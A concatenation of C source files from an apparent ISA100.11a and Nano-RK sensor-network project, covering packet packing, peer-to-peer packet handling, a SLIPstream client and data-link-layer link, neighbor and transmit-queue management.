buf[2+(i*3)+2]=p->msg[i].value;
}
// return the size of the packet (number of messages + 2 header bytes)
return (p->num_msgs*sizeof(TRANSDUCER_MSG_T)+2);
}
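/*
 * Editor's sketch (guarded out of the build): building a two-message
 * command packet for MAC 3 and stamping the checksum into buf[0]. The
 * key/value pairs and the mac_addr/key/value initializer order are
 * assumptions taken from transducer_cmd_pkt_add() above.
 */
#ifdef DOC_EXAMPLE_CMD_PKT
uint8_t cmd_pkt_example (uint8_t *buf)
{
  TRANSDUCER_MSG_T msgs[2] = { {3, 1, 0}, {3, 2, 255} };
  TRANSDUCER_CMD_PKT_T p;
  uint8_t len;
  p.num_msgs = 2;
  p.msg = msgs;
  len = transducer_cmd_pkt_add( &p, buf );  /* packs messages at buf[1..] */
  transducer_cmd_pkt_checksum( &p, buf );   /* writes the checksum to buf[0] */
  return len;
}
#endif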
uint8_t transducer_reply_pkt_add( TRANSDUCER_REPLY_PKT_T *p, uint8_t *buf, uint8_t index)
{
uint8_t i,j,next_pkt;
next_pkt=0;
for(i=0; i<index; i++ )
{
// index of next packet plus the length of the packet and header
next_pkt+=buf[next_pkt+2]+TRANSDUCER_REPLY_HEADER_SIZE;
}
if(next_pkt+p->len > MAX_PKT_PAYLOAD ) return 0;
buf[next_pkt]=p->mac_addr;
buf[next_pkt+1]=p->type;
buf[next_pkt+2]=p->len;
next_pkt+=TRANSDUCER_REPLY_HEADER_SIZE;
for(i=0; i<p->len; i++ )
buf[next_pkt+i]=p->payload[i];
return (next_pkt+p->len);
}
uint8_t transducer_reply_pkt_get( TRANSDUCER_REPLY_PKT_T *p, uint8_t *buf, uint8_t index )
{
uint8_t i,next_pkt;
next_pkt=0;
for(i=0; i<index; i++ )
{
// skip over earlier replies: payload length plus header
next_pkt+=buf[next_pkt+2]+TRANSDUCER_REPLY_HEADER_SIZE;
}
p->mac_addr=buf[next_pkt];
p->type=buf[next_pkt+1];
p->len=buf[next_pkt+2];
p->payload=&(buf[next_pkt+3]);
// return the buffer offset of the reply that was unpacked
return next_pkt;
}
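/*
 * Usage sketch (illustrative): iterate over all replies packed into a
 * payload buffer.  The message count would normally come from the enclosing
 * SAMPL packet's num_msgs field.  Guarded out of the build.
 */
#if 0
static void example_print_replies( uint8_t *buf, uint8_t num_msgs )
{
uint8_t i;
TRANSDUCER_REPLY_PKT_T r;
for(i=0; i<num_msgs; i++ )
{
transducer_reply_pkt_get( &r, buf, i );
printf( "node 0x%x type %d len %d\r\n", r.mac_addr, r.type, r.len );
}
}
#endif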
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/projects/SAMPL/client_core/.svn/text-base/p2p_handler.c.svn-base
#include "p2p_handler.h"
#include <globals.h>
#include <nrk.h>
#include <nrk_eeprom.h>
#include <ping_pkt.h>
#include <../include/sampl.h>
#ifdef PHOENIX
#include "./phoenix/phoenix.h"
#endif
PING_PKT_T p;
// Input:
// p2p_pkt_in
// Output:
// p2p_pkt_out
uint8_t handle_peer_2_peer_pkt(SAMPL_PEER_2_PEER_PKT_T *p2p_pkt_in, SAMPL_PEER_2_PEER_PKT_T *p2p_pkt_out)
{
uint8_t i;
// This function is responsible for creating the
// data that is sent back up the tree.
#ifdef DEBUG_TXT
nrk_kprintf (PSTR ("Create P2P reply: "));
#endif
// Copy header information for reply packet
p2p_pkt_out->pkt_type = p2p_pkt_in->pkt_type;
p2p_pkt_out->ctrl_flags = p2p_pkt_in->ctrl_flags;
p2p_pkt_out->seq_num = p2p_pkt_in->seq_num;
p2p_pkt_out->ttl = p2p_pkt_in->ttl-1;
p2p_pkt_out->priority = p2p_pkt_in->priority;
p2p_pkt_out->ack_retry= p2p_pkt_in->ack_retry;
p2p_pkt_out->check_rate= p2p_pkt_in->check_rate;
p2p_pkt_out->subnet_mac[0] = p2p_pkt_in->subnet_mac[0];
p2p_pkt_out->subnet_mac[1] = p2p_pkt_in->subnet_mac[1];
p2p_pkt_out->subnet_mac[2] = p2p_pkt_in->subnet_mac[2];
p2p_pkt_out->src_mac = p2p_pkt_in->src_mac;
p2p_pkt_out->dst_mac = p2p_pkt_in->dst_mac;
p2p_pkt_out->last_hop_mac = my_mac;
p2p_pkt_out->next_hop_mac = (route_table_get(p2p_pkt_in->dst_mac) & 0xff);
if(admin_debug_flag==1 && (p2p_pkt_in->ctrl_flags & DEBUG_FLAG) !=0 )
{
nrk_kprintf( PSTR( "Route Option: " ));
if(p2p_pkt_out->next_hop_mac==0xff) nrk_kprintf( PSTR("Flooding\r\n") );
nrk_kprintf( PSTR("Set Route\r\n" ));
printf( "0x%x%x: ",my_subnet_mac[0],my_mac);
nrk_kprintf( PSTR(" p2p_pkt ") );
}
// If the packet is a broadcast or direct to my node
// Packets that are directed towards a node without routing data set
// next_hop_mac to 255.
if(p2p_pkt_in->dst_mac==255 || p2p_pkt_in->dst_mac==my_mac )
{
if(admin_debug_flag==1 && (p2p_pkt_in->ctrl_flags & DEBUG_FLAG) !=0 )
nrk_kprintf( PSTR("for me\r\n") );
switch (p2p_pkt_in->pkt_type) {
case PING_PKT:
// setup 1-hop reply (change below for packet specific mods)
p2p_pkt_out->ctrl_flags = 0;
p2p_pkt_out->ttl = 1;
p2p_pkt_out->subnet_mac[0] = my_subnet_mac[0];
p2p_pkt_out->subnet_mac[1] = my_subnet_mac[1];
p2p_pkt_out->subnet_mac[2] = my_subnet_mac[2];
p2p_pkt_out->src_mac = my_mac;
p2p_pkt_out->dst_mac = p2p_pkt_in->src_mac;
p2p_pkt_out->next_hop_mac = p2p_pkt_in->src_mac;
ping_p2p_generate(p2p_pkt_out);
break;
case DATA_STORAGE_PKT:
// setup 1-hop reply (change below for packet specific mods)
p2p_pkt_out->ctrl_flags = 0;
p2p_pkt_out->ttl = 1;
p2p_pkt_out->subnet_mac[0] = my_subnet_mac[0];
p2p_pkt_out->subnet_mac[1] = my_subnet_mac[1];
p2p_pkt_out->subnet_mac[2] = my_subnet_mac[2];
p2p_pkt_out->src_mac = my_mac;
p2p_pkt_out->dst_mac = p2p_pkt_in->src_mac;
p2p_pkt_out->next_hop_mac = p2p_pkt_in->src_mac;
eeprom_storage_p2p_generate(p2p_pkt_in, p2p_pkt_out );
break;
#ifdef PHOENIX
case WIRELESS_UPDATE_PKT:
#ifdef DEBUG_TXT
nrk_kprintf (PSTR ("Wireless Update Packet\r\n"));
#endif
// Don't reply if the packet is not encrypted
if((p2p_pkt_in->ctrl_flags & ENCRYPT) == 0 ) return 0;
phoenix_wireless_update();
// This function reboots, it never returns...
break;
#endif
// Just copy the packet and route as needed
default:
#ifdef DEBUG_TXT
nrk_kprintf( PSTR( "Got UNKOWN pkt, forwarding\r\n" ));
#endif
// No clue what this packet is, so just forward it
for(i=0; i<p2p_pkt_in->payload_len; i++ )
p2p_pkt_out->payload[i]=p2p_pkt_in->payload[i];
p2p_pkt_out->payload_len=p2p_pkt_in->payload_len;
}
}else if(p2p_pkt_out->ttl>0)
{
// This packet should be forwarded
if(admin_debug_flag==1 && (p2p_pkt_in->ctrl_flags & DEBUG_FLAG) !=0 )
nrk_kprintf( PSTR("forward\r\n") );
// If the packet isn't for my handler, just copy it for forwarding
// Routing should have been correctly set above
for(i=0; i<p2p_pkt_in->payload_len; i++ )
p2p_pkt_out->payload[i]=p2p_pkt_in->payload[i];
p2p_pkt_out->payload_len=p2p_pkt_in->payload_len;
} else
{
// This packet is junk, don't reply at all
p2p_pkt_out->pkt_type = EMPTY_PKT;
return 0;
}
return 1;
}
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/src/net/isa/dmo.h
/*
* dmo.h
*
* Created on: Nov 15, 2012
* Author: azriel
* DEVICE MANAGEMENT OBJECT
*/
#ifndef DMO_H_
#define DMO_H_
typedef struct {
uint16_t dlAddress;
} DMO;
#endif /* DMO_H_ */
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/tools/SLIPstream/SLIPstream-client/main.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <slipstream.h>
#define NONBLOCKING 0
#define BLOCKING 1
#define MM 17
void meta_file_generator(char *buf);
int main (int argc, char *argv[])
{
char buffer1[48];
char buffer2[MM];
//unsigned char buf[3];
int v,cnt=0;
if (argc != 3) {
printf ("Usage: server port\n");
exit (1);
}
v=slipstream_open(argv[1],atoi(argv[2]),NONBLOCKING);
sprintf (buffer1, "This is a sample slip string: Count %d\n", cnt);
v=slipstream_send(buffer1,strlen(buffer1)+1);
if (v == 0) printf( "Error sending\n" );
//cnt = 0;
//bzero(buffer2,11);
while (1) {
//cnt++;
//sprintf (buffer1, "This is a sample slip string: Count %d\n", cnt);
//v=slipstream_send(buffer1,strlen(buffer1)+1);
//if (v == 0) printf( "Error sending\n" );
v=slipstream_receive( buffer2);
//printf("V:%d",v);
//buffer2[10]='\0';
if (v > 0) {
meta_file_generator(buffer2);
}
// for test
/*else{
buf[0]=0xff;
buf[1]=0xff;
buf[2]=0xff;
meta_file_generator(buf);
}*/
// Pause for 1 second
sleep (1);
}
}
void meta_file_generator(char *buf)
{
FILE * metadata;
int i;
char fileName[10];
// XOR mask used to recover the original bytes (presumably matching the sender side)
unsigned char zero_killer=0xaa;
sprintf(fileName, "%d", buf[0]-1);
strcat(fileName, ".txt");
//fileName="test";
metadata = fopen(fileName,"a+");
for(i=1;i<MM;i++){
buf[i] ^= zero_killer;
fputc(buf[i],metadata);
//printf("%d",buf[i]);
}
fclose(metadata);
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/projects/SAMPL/pkt_handlers/.svn/text-base/ping_pkt.c.svn-base
#include <globals.h>
#include <sampl.h>
#include "ping_pkt.h"
#ifdef NANORK
#include <nrk.h>
#include <nrk_error.h>
#else
#define my_mac 0
#define RF_MAX_PAYLOAD_SIZE 128
#endif
#define MAX_MSGS 50
int8_t ping_generate(SAMPL_UPSTREAM_PKT_T *pkt)
{
PING_PKT_T p;
p.mac_addr=my_mac;
pkt->payload_len = ping_pkt_add( &p, pkt->payload,0);
pkt->num_msgs=1;
return NRK_OK;
}
int8_t ping_p2p_generate(SAMPL_PEER_2_PEER_PKT_T *pkt)
{
PING_PKT_T p;
p.mac_addr=my_mac;
pkt->payload_len = ping_pkt_add( &p, pkt->payload,0);
return NRK_OK;
}
int8_t ping_aggregate(SAMPL_UPSTREAM_PKT_T *in, SAMPL_UPSTREAM_PKT_T *out)
{
uint8_t i,k,dup;
PING_PKT_T p1, p2;
if(in->num_msgs>MAX_MSGS || out->num_msgs>MAX_MSGS )
{
#ifdef NANORK
nrk_kprintf( PSTR("MAX messages exceeded in aggregate!\r\n"));
#endif
return NRK_ERROR;
}
for(i=0; i<in->num_msgs; i++ )
{
dup=0;
// get next ping packet to compare against current outgoing list
ping_pkt_get( &p1, in->payload, i );
for(k=0; k<out->num_msgs; k++ )
{
// get packet from outgoing list and compare against incoming packet
ping_pkt_get( &p2, out->payload, k );
if(p1.mac_addr==p2.mac_addr) dup=1;
}
if(dup==0)
{
// if packet is unique, add to outgoing packet
out->payload_len=ping_pkt_add( &p1, out->payload, out->num_msgs );
out->num_msgs++;
}
}
return NRK_OK;
}
void ping_pkt_get( PING_PKT_T *p, uint8_t *buf, uint8_t index )
{
p->mac_addr=buf[index*PING_PKT_SIZE];
}
uint8_t ping_pkt_add( PING_PKT_T *p, uint8_t *buf, uint8_t index )
{
if(index*PING_PKT_SIZE>RF_MAX_PAYLOAD_SIZE) return (index*PING_PKT_SIZE);
buf[index*PING_PKT_SIZE]= p->mac_addr;
return ((index+1)*PING_PKT_SIZE);
}
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/src/net/isa/isa_messagetypes.h
#ifndef ISAMESSAGETYPES_H
#define ISAMESSAGETYPES_H
#include <dlmo.h>
// ********************************* DAUX Structure ********************************************
typedef struct {
uint8_t adSelection;//DauxType 3 bits, ChMapOv 1 bit, DauxOptSlowHop 1 bit,Reserved 3 bit
//Time Synchronization information
uint32_t DauxTAIsecond;
uint16_t DauxTAIfraction;
//Superframe Information
uint16_t DauxTsDur;
uint16_t DauxChIndex;
uint8_t DauxChBirth;
uint16_t DauxSfPeriod;
uint16_t DauxSfBirth;
uint8_t DauxChRate;
uint16_t DauxChMap;
//Integrity Check
uint16_t IntegrityCheck;
}DLMO_DAUX;
/***************************DROUT (COMPRESSED VARIANT)******************************************/
typedef struct{
/*
* Compress. If this value is set to 1, the compressed variant of the DROUT format shall be
used.
• Priority. This shall be set to the DPDU’s 4-bit priority.
• DlForwardLimit and DlForwardLimitExt (forwarding limit) limit the number of times that a
DPDU may be forwarded within a DL subnet. If the forwarding limit is less than 7, the
value shall be transmitted in DlForwardLimit and DlForwardLimitExt shall be elided. If the
forwarding limit is greater than or equal to 7, DlForwardLimit shall be transmitted as 7, and
the forwarding limit shall be transmitted in DlForwardLimitExt.
*
*/
uint8_t info; // Compress (1) Priority (4) DlForwardLimit (3)
uint8_t DlForwardLimitExt;
/*
* GraphID (8 bits). GraphIDs compliant with this standard are 12-bit unsigned integers. In
the common case where the route is a single graph ID in the range of 1-255, the
compressed variant of the DROUT sub-header shall be used. Additionally, the
compressed variant is used in single-hop source routing, wherein GraphID=0 shall indicate
that the destination is one hop away. Since the single hop destination address can be
found in the MHR, it does not need to be repeated in DROUT. GraphID=0 shall be used
during the join process for addressing to and from a neighboring proxy, and is the only
way in this standard to indicate a 64-bit destination address in DROUT.
*
*/
uint8_t GraphId;
}DLMO_DROUT;
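/*
 * Illustrative helper (not in the original source): pack the compressed
 * DROUT info byte from its three fields.  The bit placement (Compress in
 * the most significant bit) is an assumption consistent with the field
 * comment above.  Guarded out of the build.
 */
#if 0
static inline uint8_t drout_pack_info( uint8_t compress, uint8_t priority,
                                       uint8_t fwd_limit )
{
return (uint8_t)( ((compress & 0x01) << 7) |
                  ((priority & 0x0f) << 3) |
                  (fwd_limit & 0x07) );
}
#endif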
/*
 * Thoughts on graph
 *
 * Once we get the link, check the graph type. If the graph type is 0, do what we were doing till now (later on, provided a neighbor is configured).
 * Else if the graph type is 1, the link is only for a graph. Find the neighbor (again oldest and highest priority)
 * that is in the queue and whose DROUT header specifies this graph. It should somehow store the number of tries it has had.
 * Based on this number, we select the neighbor to transmit to. If the tries exceed some number, remove from the queue.
 * If there is no one with this graph in the queue, then just do the normal sending to a neighbor (only if the graph type is 2).
 *
 */
/*
 * The following are the message types that will go inside the payload.
 * I am defining my own message types because they are a part of the
 * application layer and this project's implementation is concerned with
 * the data link layer. These messages should gradually be
 * substituted by ISA-compliant message types.
 *
 */
typedef enum{
NEIGHBOR_TABLE_REPORT,
DUMMY_PAYLOAD,
ADD_NEIGHBOR,
ADD_GRAPH,
ADD_LINK,
FLUSH_CANDIDATE_TABLE
} message_type;
typedef struct {
uint8_t numberOfNeighbors; //can be an neighbor table report, or some other command
uint8_t candidate;
}NEIGHBOR_TABLE;
typedef struct {
uint8_t type; //can be an neighbor table report, or some other command
uint8_t data;
}MESSAGE;
typedef struct { // This structure will be used to send and receive neighbor configuration information from uart
uint16_t neighborId;
}CONFIG_NEIGHBOR;
typedef struct{ // This structure will be used to send and receive graph configuration information from uart
uint8_t graphId;
uint8_t neighborCount;
uint16_t neigh1;
uint16_t neigh2;
uint16_t neigh3;
}CONFIG_GRAPH;
typedef struct {// This structure will be used to send and receive link configuration information from uart
uint8_t slotNumber;
uint16_t neighborId;
uint8_t graphId;
uint8_t linkType;
uint8_t graphType;
}CONFIG_LINK;
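/*
 * Illustrative example (not part of the original header): a CONFIG_LINK
 * record as it might arrive over the UART configuration channel.  All
 * field values are assumptions.  Guarded out of the build.
 */
#if 0
static const CONFIG_LINK example_link = {
3,      /* slotNumber: slot within the superframe */
0x0002, /* neighborId: 16-bit DL address of the neighbor */
1,      /* graphId: graph this link serves */
0,      /* linkType: implementation-specific link type code */
1       /* graphType: 1 = link dedicated to a graph (see notes above) */
};
#endif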
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/src/net/isa/dlmo.c
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
* <NAME>
*******************************************************************************/
//#include <rtl_debug.h>
#include <include.h>
#include <ulib.h>
#include <avr/sleep.h>
#include <avr/wdt.h>
#include <avr/eeprom.h>
#include <stdio.h>
#include <avr/interrupt.h>
#include <nrk.h>
#include <nrk_events.h>
#include <nrk_timer.h>
#include <nrk_error.h>
//#include <rtl_defs.h>
#include <stdlib.h>
#include <isa_error.h>
#include <dlmo.h>
//********************** Global variables*************************************
DLMO_LINK dlmoLink[DLMO_LINK_MAX_COUNT];
DLMO_NEIGHBOR dlmoNeighbor[DLMO_NEIGHBOR_MAX_COUNT];
ISA_QUEUE isaQueue[TRANSMIT_QUEUE_MAX_SIZE] ;
//ISA_QUEUE *isaQueuePointer[TRANSMIT_QUEUE_MAX_SIZE]
uint8_t isa_sched[ISA_SLOTS_PER_FRAME];
uint64_t isa_tdma_rx_mask; //should not need this
uint64_t isa_tdma_tx_mask; // should not need this
uint64_t isa_slot; //Set to 1 if slot is in use
uint8_t isaTxQueueSize; //holds the number of elements present in the Queue
//********************Local function definitions***********************************
void configureSlot(uint8_t slotNumber, uint16_t neighborId, LinkType linkType, bool clockSource);
void dlmoInit();
int8_t addLink (uint8_t slotNumber, DLMO_NEIGHBOR* neighborIndex,LinkType linkType);
DLMO_NEIGHBOR* addNeighbor(uint16_t index,uint64_t EUI64, uint8_t groupCode1, uint8_t groupCode2, bool clockSource,uint8_t linkBacklogIndex,uint8_t linkBacklogDur, uint8_t linkBacklogActivate);
int8_t dd_data_request(uint16_t srcAddr, uint16_t destAddr, uint8_t priority, bool discardEligible, uint8_t ecn, bool lh, uint8_t contractId, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry));
void sendPacket(uint16_t destAddr, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry)) ;
int8_t enQueue(uint16_t neighbor, uint8_t priority, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry));
void isaFreePacket(ISA_QUEUE *entry);
void dlmoInit()
{
uint8_t i;
//for LINK
for (i=0; i<DLMO_LINK_MAX_COUNT; i++)
{
(dlmoLink[i].isPresent = false);
}
//for NEIGHBOR
for(i=0; i<DLMO_NEIGHBOR_MAX_COUNT; i++)
{
dlmoNeighbor[i].isPresent = false;
}
//Initialization for Transmit Queue
isaTxQueueSize = 0; //Explicitly initialize this to 0
/*
for(i=0; i<TRANSMIT_QUEUE_MAX_SIZE; i++)
{
isaQueuePointer[i] = &isaQueue[i];
}
*/
}
int8_t addLink(uint8_t slotNumber, DLMO_NEIGHBOR* neighborIndex,LinkType linkType)
{
uint8_t index;
//find if there exists a free link
for (index = 0; index < DLMO_LINK_MAX_COUNT; index++)
{
if (dlmoLink[index].isPresent == false) break;
}
if (index == DLMO_LINK_MAX_COUNT)
{
setIsaError(LINK_CAPACITY_ERROR);
return -1;
}
//we have found a free index
dlmoLink[index].isPresent = true;
dlmoLink[index].neighbor = neighborIndex;
dlmoLink[index].linkType = linkType;
dlmoLink[index].chOffset = slotNumber;
// channel offset implementation will change as the protocol develops
return 0;
}
DLMO_LINK * findLink(uint8_t slot){
uint8_t index;
for (index = 0; index < DLMO_LINK_MAX_COUNT; index++)
{
if (dlmoLink[index].isPresent == true && dlmoLink[index].chOffset == slot ) {
return &dlmoLink[index];
}
}
printf ("This slot is not configured yet: %d\n\r" , slot);
return NULL;
}
DLMO_NEIGHBOR* addNeighbor(uint16_t index,uint64_t EUI64, uint8_t groupCode1, uint8_t groupCode2,bool clockSource,uint8_t linkBacklogIndex,uint8_t linkBacklogDur, uint8_t linkBacklogActivate)
{
uint8_t i,free_index=0;
bool free_index_present = false;
for(i=0;i<DLMO_NEIGHBOR_MAX_COUNT;i++)
{
if(dlmoNeighbor[i].isPresent == true && index == dlmoNeighbor[i].index)
{
printf("Neighbor Exists in Table at %d\n",index);
// return the existing entry, not the last free index seen
return &dlmoNeighbor[i];
}
if(dlmoNeighbor[i].isPresent == false)
{
free_index_present = true;
free_index = i;
}
}
if(free_index_present == false)
{
setIsaError(NEIGHBOR_CAPACITY_ERROR);
return NULL;
}
else
{
dlmoNeighbor[free_index].index = index;
dlmoNeighbor[free_index].isPresent = true;
dlmoNeighbor[free_index].EUI64 = EUI64;
dlmoNeighbor[free_index].groupCode1 = groupCode1;
dlmoNeighbor[free_index].groupCode2 = groupCode2;
if(clockSource == true) dlmoNeighbor[free_index].typeInfo = ISASET(dlmoNeighbor[free_index].typeInfo,CLOCK_PREFERRED);
dlmoNeighbor[free_index].linkBacklogIndex = linkBacklogIndex;
dlmoNeighbor[free_index].linkBacklogDur = linkBacklogDur;
dlmoNeighbor[free_index].linkBacklogActivate = linkBacklogActivate;
return &dlmoNeighbor[free_index];
}
}
void configureSlot(uint8_t slotNumber, uint16_t neighborId, LinkType linkType, bool clockSource)
{
DLMO_NEIGHBOR* neighborIndex; //store the neighbor index to pass to addLink()
if (slotNumber >= ISA_MAX_SLOTS) {
printf ("Slot number not in range");
return;
}
//Call the function to add a neighbor
neighborIndex = addNeighbor(neighborId,0, 0, 0, clockSource,0,0, 0);
if (neighborIndex == NULL)//
{
printIsaError();
return;
}
if (addLink(slotNumber, neighborIndex, linkType) == -1)
{
printIsaError();
return;
}
//record that the slot is in use- used to calculate next wakeup
isa_slot |= ((uint64_t) 1) << slotNumber;
}
/**
* isa_get_slots_until_next_wakeup()
*
* This function returns the absolute number of slots between the current_slot
* and the next RX/TX related wakeup.
*
* Argument: current_slot is the current slot
* Return: uint16_t number of slots until the next wakeup
*/
uint16_t isa_get_slots_until_next_wakeup (uint16_t current_global_slot)
{
uint16_t min_slot;
uint8_t test_slot;
uint8_t wrapped_slot;
uint8_t current_local_slot;
uint64_t testVariable = 0;
current_local_slot = current_global_slot%ISA_SLOTS_PER_FRAME;
testVariable |= ((uint64_t) 1) << (current_local_slot+1);
for (test_slot = current_local_slot+1; test_slot < ISA_SLOTS_PER_FRAME; test_slot++) {
if(isa_slot & testVariable) { //slot is scheduled
min_slot = test_slot-current_local_slot;
return min_slot;
}
testVariable = testVariable << 1;
}
// scheduled slot wrapped back
testVariable = 1;
for (test_slot = 0; test_slot<=current_local_slot;test_slot++){
if(isa_slot & testVariable){ //slot is scheduled
min_slot = (ISA_SLOTS_PER_FRAME - current_local_slot + test_slot);
return min_slot;
}
testVariable = testVariable << 1;
}
// fail safe: nothing is scheduled at all, so sleep one full frame
return ISA_SLOTS_PER_FRAME;
}
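/*
 * Worked example (illustrative): with ISA_SLOTS_PER_FRAME = 25 and slots 3
 * and 20 scheduled in isa_slot, a call at local slot 5 returns 15 (next
 * wakeup at slot 20), while a call at local slot 21 wraps around and
 * returns 7 (25 - 21 + 3).
 */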
// *** Data link layer service access points ****
/*
* SrcAddr (NL source address)
* DestAddr (NL destination address)
* Priority (priority of the payload)
* DE (discard eligible)
* ECN (explicit congestion notification)
* LH (last hop, NL)
* ContractID (ContractID of the payload)
* DSDULength (payload length)
* DSDU (number of octets as per DSDULength)
* DSDUHandle (uniquely identifies each invocation of this primitive)
*
*/
int8_t dd_data_request(uint16_t srcAddr, uint16_t destAddr, uint8_t priority, bool discardEligible, uint8_t ecn, bool lh, uint8_t contractId, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry))
{
//Future - Lookup DestAddr and add into the Queue with for a particular next hop
//Configure the headers within the payload (whichever applicable)
return enQueue (destAddr, priority, length, payload, slot_callback);
}
//Wrapper for dd_data_request
void sendPacket(uint16_t destAddr, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry)){
if (dd_data_request(0, destAddr, 0, 0, 0, 0, 0, length, payload, slot_callback) == -1){
printIsaError();
}
}
//****************************************Functions for Queue***********************************************
/*
* NOTE : We are using a layer of pointers so that we can easily reorder elements in the queue without having to copy entire entries
* We are only swapping the pointers. Basically using a layer of indirection
* Operation of addition into the queue is as follows
* Iterate through the queue to find a free slot to insert
* Make sure we don't pass any lower priority valid entries
* If we dont and find a free entry, we insert into this entry and then fix from here onwards
* Fix means swapping if the next valid entry is of higher priority, thus finding the right place in the queue for the new entry
*
* If we do pass a lower priority entry without being able to find a place to insert then
* Record the place where we crossed this entry
* Run till we can find a place to insert and insert
* Fix in the backward direction till the recorded index
*/
int8_t enQueue(uint16_t neighbor, uint8_t priority, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry))
{
uint8_t i;
/*
bool passedLowerPriority = false;
bool fixRequired = false;
bool insertionDone = false;
uint8_t lowerPriorityIndex;
uint8_t usedIndex;
ISA_QUEUE * temp;
*/
if (isaTxQueueSize > TRANSMIT_QUEUE_MAX_SIZE){
setIsaError(TRANSMIT_QUEUE_CAPACITY_ERROR);
return -1;
}
//check if length of payload is within bounds
if (length >= RF_MAX_PAYLOAD_SIZE) {
setIsaError(MAX_PAYLOAD_ERROR);
return -1;
}
//if we are here, we should have place to add into the Queue
//find the first free index and insert
for (i = 0; i < TRANSMIT_QUEUE_MAX_SIZE; i++){
if (isaQueue[i].usedSlot == false){
isaQueue[i].length = length;
isaQueue[i].priority = priority;
isaQueue[i].transmitPending = true;
isaQueue[i].usedSlot = true;
isaQueue[i].neighbor = neighbor;
isaQueue[i].slot_callback = slot_callback;
memcpy(isaQueue[i].tx_buf, payload, length );//copy the payload
nrk_time_get(&isaQueue[i].time); //copy the time when I was inserted into Queue
isaTxQueueSize++;
break;
}
}
if ( i == TRANSMIT_QUEUE_MAX_SIZE){
printf(" Critical error 2");
return -1;
}
return 1;
//this if evaluates the event in which I have not copied into a slot and find an entry of lower priority
/*
if (isaQueuePointer[i]->usedSlot == true && isaQueuePointer[i]->transmitPending = false && insertionDone == false && passedLowerPriority == false && isaQueuePointer[i]->priority < priority && isaQueuePointer[i]->neighbor == neighbor){
passedLowerPriority = true;
lowerPriorityIndex = i;
continue;
}
//if passedLowerPriority == true , then find a slot to insert and insert-> swap pointers for lowerPriority and free
//fix for every index till free index
if (insertionDone == false && isaQueuePointer[i]->usedSlot == false){
//find a free slot to insert
usedIndex = i;
isaQueuePointer[i]->length = length;
isaQueuePointer[i]->priority = priority;
isaQueuePointer[i]->transmitPending = true;
isaQueuePointer[i]->usedSlot = true;
isaQueuePointer[i]->neighbor = neighbor;
memcpy(isaQueuePointer[i]->tx_buf, payload, length );//copy the payload
isaTxQueueSize++;
insertionDone = true;
if (passedLowerPriority == true) break; //IF this is the case, I fix after this loop
continue;
}
if (insertionDone == true && isaQueuePointer[i]->usedSlot == true && isaQueuePointer[i]->transmitPending = false && isaQueuePointer[i]->neighbor == neighbor && isaQueuePointer[i]->priority > isaQueuePointer[usedIndex]->priority ){ //Swap
//we come here only if fix required
temp = isaQueuePointer[i];
isaQueuePointer[i] = isaQueuePointer[usedIndex];
isaQueuePointer[usedIndex] = temp;
usedIndex = i;
}
//we can return now if we did not come here through the condition where I inserted after a higher priority
if (passedLowerPriority == false) return 1;
//I am here if I inserted after lower priority. Now I need to take care of fixing that
// I iterate from usedIndex to lowerPriority Index in the backward direction and fix
for (i = usedIndex -1 ; i >= lowerPriorityIndex ; i--)
if (isaQueuePointer[i]->usedSlot == true && isaQueuePointer[i]->transmitPending = false && isaQueuePointer[i]->neighbor == neighbor && isaQueuePointer[i]->priority < isaQueuePointer[usedIndex]->priority){
temp = isaQueuePointer[i];
isaQueuePointer[i] = isaQueuePointer[usedIndex];
isaQueuePointer[usedIndex] = temp;
usedIndex = i;
}
return 1;
*/
}
ISA_QUEUE * getHighPriorityEntry(uint16_t neighbor){
nrk_time_t time;
uint8_t priority = 0;
ISA_QUEUE* tempIndex;
bool found = false;
uint8_t i;
for (i = 0; i < TRANSMIT_QUEUE_MAX_SIZE; i++){
if (isaQueue[i].usedSlot == true && isaQueue[i].transmitPending == true && isaQueue[i].neighbor == neighbor){
if (found == false){
found = true;
priority = isaQueue[i].priority;
tempIndex = &isaQueue[i];
time.nano_secs = isaQueue[i].time.nano_secs;
time.secs = isaQueue[i].time.secs;
}
// if the priority is greater or ( priority is the same and ( seconds is less or nanosecs is less))
if (found == true && ( priority < isaQueue[i].priority || ( (priority == isaQueue[i].priority) && ( time.secs > isaQueue[i].time.secs || (time.secs == isaQueue[i].time.secs && time.nano_secs > isaQueue[i].time.nano_secs ))))){
priority = isaQueue[i].priority;
tempIndex = &isaQueue[i];
time.nano_secs = isaQueue[i].time.nano_secs;
time.secs = isaQueue[i].time.secs;
}
}
}
if (found == false) {
return NULL;
}
return tempIndex;
}
//*********************************************************************************************************
void isaFreePacket(ISA_QUEUE *entry){
entry->usedSlot = false;
isaTxQueueSize--;
}
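/*
 * Usage sketch (illustrative, not part of the original source): queue a
 * payload for a neighbor via the sendPacket() wrapper and release the queue
 * entry once the slot layer invokes the completion callback.  The neighbor
 * address and payload are assumptions.  Guarded out of the build.
 */
#if 0
static void example_tx_done( ISA_QUEUE *entry )
{
isaFreePacket( entry );  /* return the queue slot to the pool */
}
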